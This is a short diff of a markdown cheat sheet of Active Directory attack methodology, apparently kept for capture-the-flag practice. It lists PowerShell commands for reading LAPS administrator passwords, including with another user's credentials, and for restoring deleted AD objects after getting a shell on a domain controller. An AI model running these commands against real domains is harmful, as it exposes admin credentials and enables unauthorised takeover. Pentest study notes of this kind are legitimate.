AlienX2001/methodology-boxes/Active Directory enum.md

 We can read the LAPS password using the following `Get-ADComputer "ComputerNameHere" -Properties ms-mcs-AdmPwd, ms-mcs-AdmPwdExpirationTime, canonicalname` (If our user has the readlaps perm)

+### If we can get a shell on the DC, we can get all the deleted objects, which we might control after undeleting them if we can.
+We can get all the deleted objects using the following `Get-ADObject -Filter 'isDeleted -eq $True' -IncludeDeletedObjects` (Using the `Import-Module ActiveDirectory`) And then Restore it using the following `Restore-ADObject -Identity 'GUID of Object'`

 `$p = ConvertTo-SecureString 'PasswordOfUserAccount' -AsPlainText -Force;$c = New-Object System.Management.Automation.PSCredential ('UserAccount', $p)`
 and then `Get-ADComputer "ComputerNameHere" -Credential $c -Properties ms-mcs-AdmPwd, ms-mcs-AdmPwdExpirationTime, canonicalname` (If our user doesnt have readlaps perm but we have creds of a user having read laps perm)